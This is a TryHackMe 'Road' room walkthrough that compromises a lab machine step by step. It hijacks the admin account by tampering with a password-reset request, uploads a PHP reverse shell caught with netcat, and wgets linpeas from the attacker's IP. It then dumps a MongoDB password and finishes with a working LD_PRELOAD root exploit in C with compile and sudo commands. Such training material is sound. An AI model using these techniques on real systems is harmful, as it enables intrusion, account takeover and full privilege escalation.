Road Room: A TryHackMe 101 Walkthrough

Road

Introduction:

Hey everyone, gear up for an exciting escapade in the Road Room over at TryHackMe! This room offers a Medium level of difficulty, striking a balance between challenge and fun. It’s perfect for those looking to step up their cybersecurity game. So, let’s roll up our sleeves, dive into the challenges, and make the most out of this cybersecurity adventure!

Tools Used:

The Road room utilizes five essential tools for penetration testing:

1. Nmap: A powerful network scanning tool that helps identify open ports, services, and vulnerabilities on a target machine.
2. FFUF: A powerful open-source web fuzzing tool designed to rapidly discover hidden files and directories on web servers through customizable wordlists and filtering options.
3. Netcat: A versatile utility for TCP/UDP data transfer, vital for tasks like port scanning, banner grabbing, and network troubleshooting in penetration testing and management.
4. LinPeas: LinPeas.sh silently analyzes Linux systems, revealing potential weaknesses in configurations, vulnerabilities, and privileges for robust security resolution.
5. Burp Suite: Burp Suite quietly scrutinizes web applications, adeptly identifying security vulnerabilities during penetration testing.

Our Goal:

Our main objective, as always, is to acquire both the User and Root flags. Let’s focus on completing the tasks and uncovering those flags to mark another successful venture in our cybersecurity journey!

Step 1: Connecting With TryHackMe VPN

Browser

Before starting, ensure your Try Hack Me VPN is connected and working. If you need assistance with a VPN connection, refer to this article.

Step 2: Launch the Machine

Browser

Start the machine provided in the room and let it run for 3–4 minutes before proceeding, a box will appear like below indicating that the machine is working and you will have the IP Address of the newly deployed machine.

Browser

Step 3: Ping the Machine

Linux Terminal

Ensure the machine is responsive by pinging it using the terminal of your Kali Linux machine.

Use the command: ping <Machine_IP>.

example:-

ping 10.10.154.237

If successful, proceed to the next step.

Step 4: Port Scanning with Nmap

Linux Terminal + Browser

Perform a thorough port scan using Nmap with the command: nmap -sV -p- -v <Machine_IP>.

example:-

nmap -sV -p- -v 10.10.154.237

Be patient, this may take some time. The flags are used to serve specific purposes

for example:

• -v: Increase verbosity.
• -sV: Service version detection.
• -p-: Scan all ports.

Step 5: Analyzing Open Ports

Linux Terminal

As we can now see the open ports and services. Focus on port 80 as it seems exploitable and the service running on it is HTTP. However, port 22 is also open with SSH, but without credentials, our focus shifts to port 80.

Step 6: Accessing The Website

Browser

Access the web interface of port 80 in your browser using the URL format http://<Machine_IP>:80.

example:-

http://10.10.154.237:80

Step 7: Directory Busting with ffuf

Linux Terminal (ffuf)

In this step, we will conduct directory busting on the website using the ffuf tool. The chosen medium wordlist for directory busting is used with the following command:

ffuf -u http://10.10.154.237/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

Be patient, this may take some time. The flags are used to serve specific purposes

for example:

• -u http://10.10.154.237/FUZZ: Target URL for directory busting, using "FUZZ" as a placeholder for items from the wordlist.
• -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: Wordlist file path for directory busting.
• -c: Colorized Output, makes it easier to understand the output.

The outcomes of this directory busting will be analyzed in the subsequent steps.

Step 8: Analyzing ffuf Output

Linux Terminal + Browser

Upon executing the ffuf directory busting command, carefully examine the output to identify any discovered directories or files. We discovered a directory named “v2.” To explore further, we use it as an endpoint in the URL.

Step 9: User Registration and Login Process

Browser

After finding the v2 directory with ffuf, we discovered a login form on the website. Choosing to Register led us to a page where we could create a new account.

Browser

Now, to log in, we return to the site and click the “Sign In” Button. Enter the username or email and password used during registration, then click “Sign In” Upon successful login, explore the website’s features.

Step 10: Analyzing Website Features and Devising an Exploitation Plan

Browser

After successfully logging into the website, we explored various features. Notably, we discovered a file upload feature accessible through the profile page but restricted to the admin. The admin’s email, “admin@sky.thm,” was provided.

Browser

Additionally, we discovered a password change functionality on the reset user page. However, the uneditable username field presented a challenge.

Exploitation Plan: Interception and Modification

Our strategy involves capturing the change password request in Burp Suite, modifying the email to the admin’s, and changing the admin’s password. Subsequently, we plan to log in using the admin’s credentials, upload a Reverse shell file via the restricted profile page, and establish a reverse shell for expanded access.

Step 11: Capturing and Modifying Change Password Request in Burp Suite

Browser

To capture the change password request, initiate the process by updating your user’s password. Input a new password in the “New Password” field, confirm it in the “Confirm Password” field, and submit the changes. This action triggers the request we seek.

Burp Suite

Next, open Burp Suite and check for the captured request. Confirm that it corresponds to the change password request by verifying its content. Once confirmed, send the request to the Repeater for further manipulation.

Burp Suite

In the Repeater, modify the email field to “admin@sky.thm” and resend the request. A successful response with a 200 status code indicates the password change for the admin account.

Browser

To verify the change, log in to the website using the admin credentials. If successful, you’ll gain access to the website as the admin. This sets the stage for the next steps, where we’ll proceed to upload a reverse shell script and advance our exploitation efforts.

Step 12: Obtaining a Reverse Shell from the Website

Given the ability to upload files via an external link to the website, a reverse shell can be obtained using the Pentestmonkey reverse shell PHP script. Download the script from this link.

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell

PHP Reverse Shell Script

Before uploading the PHP script, make the necessary modifications by adding your IP address in the designated section (//Change This) within the script. Specify your IP, such as the Tryhackme VPN IP, and set the port to 1234.

Linux Terminal (netcat)

In a new terminal, start a listener by executing the following Netcat command:

nc -nvlp 1234

Browser

Now that we’ve successfully logged in as an admin, proceed to the profile page where we can upload the PHP reverse shell script. After uploading the script, it’s crucial to note that we might not immediately establish a connection from the shell. This issue arises because we need to locate and open the file. To pinpoint the file, inspect the source code of the page.

Source Page

Upon examination, you’ll discover a path, possibly resembling “/v2/profileimages/”. Combine this path with your file name, creating a URL like http://10.10.154.237/v2/profileimages/php-reverse-shell.php.

Linux Terminal + Browser

Accessing this URL should trigger the execution of the reverse shell script. Confirm the success of the operation by checking for a connection in your listener or verifying any expected changes in the system.

Step 13: Making the Shell Interactive

Linux Terminal

To make the shell interactive for improved navigation, execute the following commands sequentially:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo

These commands facilitate the transition to an interactive shell environment. Once these commands are executed, the shell becomes interactive. With an interactive shell, you can navigate through the system more efficiently. In the upcoming step, we will proceed to explore the machine further and locate the second key flag.

Step 14: User Flag Acquisition

Linux Terminal

After establishing an interactive reverse shell, explore the system to uncover valuable directories. Execute commands to locate crucial files. In the process, identify the “User.txt” file residing in the /home/webdeveloper directory.

Use the cat command to read the contents of this file and retrieve the user flag. This marks a successful completion of the user-level exploitation.

Step 15: From www-data To webdeveloper

After securing the user flag, the next objective is to elevate privileges and obtain the root flag. Utilize the LinPeas.sh program, available for download here.

linpeas.sh

Linux Terminal

Transfer LinPeas.sh to the victim’s system by initiating a Python3 server on your local machine with python3 -m http.server 8000. On the victim's PC, navigate to the /tmp directory and execute wget 10.17.98.201:8000/LinPeas.sh to fetch the program.

Grant execution permissions to LinPeas.sh using chmod +x linpeas.sh. Execute the program with ./linpeas.sh. Review the output for crucial system information.

An unusual finding might reveal a running MongoDB server on the machine. Explore the database using the following commands:

mongo
show dbs
use backup
db.user.find().pretty()

Linux Terminal

This reveals the password for the webdeveloper which is “BahamasChapp123!@#”. Utilize this information to SSH into the system.

Step 16: Privilege Escalation and Root Flag

After gaining SSH access as the webdeveloper with the newly discovered password, we execute the sudo -l command. This reveals that the /usr/bin/sky_backup_utility can be executed without requiring a password.

Linux Terminal

To exploit this vulnerability, create an exploit.c file with the following code:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setresuid(0,0,0);
        system("/bin/bash -p");
}

Compile the exploit.c file using the command:

gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles

This generates a .so file. Execute the exploit using the command:

sudo LD_PRELOAD=/home/webdeveloper/exploit.so /usr/bin/sky_backup_utility

This command runs the sky_backup_utility with elevated privileges, leading to the execution of the malicious code. As a result, you gain root access.

Kali Linux

Navigate to the root directory and use cat to retrieve the contents of the Root.txt flag, completing the privilege escalation and obtaining the root flag.

Conclusion:

Our penetration test showcased successful exploitation, exposing weaknesses in user processes and system configurations. Through tools like Burp Suite and LinPeas.sh, we escalated privileges systematically. This exercise underlines the importance of effective techniques, secure configurations, and ongoing vigilance against emerging threats. It serves as a practical reminder of the necessity for a proactive cybersecurity approach.

If you found this article insightful and informative, please consider following for more in-depth explorations and analyses in the realm of cybersecurity. Your support is greatly appreciated!